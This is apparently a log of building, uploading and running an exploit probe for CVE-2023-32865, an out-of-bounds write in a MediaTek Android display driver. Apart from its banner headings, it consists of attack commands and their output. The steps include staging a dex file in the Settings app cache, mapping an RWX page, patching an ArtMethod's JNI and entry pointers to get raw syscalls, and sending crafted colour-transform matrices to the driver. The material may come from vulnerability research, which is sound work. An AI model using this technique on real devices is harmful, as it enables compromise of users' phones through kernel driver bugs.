[*] Build
javac -source 8 -target 8 -cp android-34/android.jar:07-cve-2023-32836-display-overflow/poc -d /tmp/mtk32865-probe-build 10-cve-2023-32865-display-drm-oob-write/poc/Mtk32865Probe.java
d8 --min-api 29 --output /tmp/mtk32865-probe-dex /tmp/mtk32865-probe-build/Mtk32865Probe.class

[*] Upload
remote=/data/data/com.android.settings/cache/mtk32865_probe.dex
size=2424 bytes

[*] Run
dalvikvm64 -cp /data/data/com.android.settings/cache/mtk32865_probe.dex:/data/data/com.android.settings/cache/trigger.dex Mtk32865Probe

[*] CVE-2023-32865 support_color_transform probe
[+] Scratch buffer at 0x79aa314000
[*] Trying anonymous PROT_RWX mmap...
[+] Anonymous RWX page at 0x779a131000
[+] Wrote syscall stubs: JNI@+0x00 (36B), Quick@+0x40 (36B)
[*] ArtMethod for nativeSyscall at 0x770ef9e7e0
    access_flags = 0x10000108 [NATIVE]
    data (JNI ptr) = 0x771761a180
    entry_point    = 0x1038000812c04220
[*] Patching data_ (JNI) -> 0x779a131000
[*] Patching entry_point (quick) -> 0x779a131040
    data_       = 0x779a131000 OK
    entry_point = 0x779a131040 OK
[+] ArtMethod patched
[+] Syscall infrastructure ready

[+] fd=5
[+] zero matrix -> 0
[+] unsupported matrix[0][3]=1 -> -14 (EFAULT)
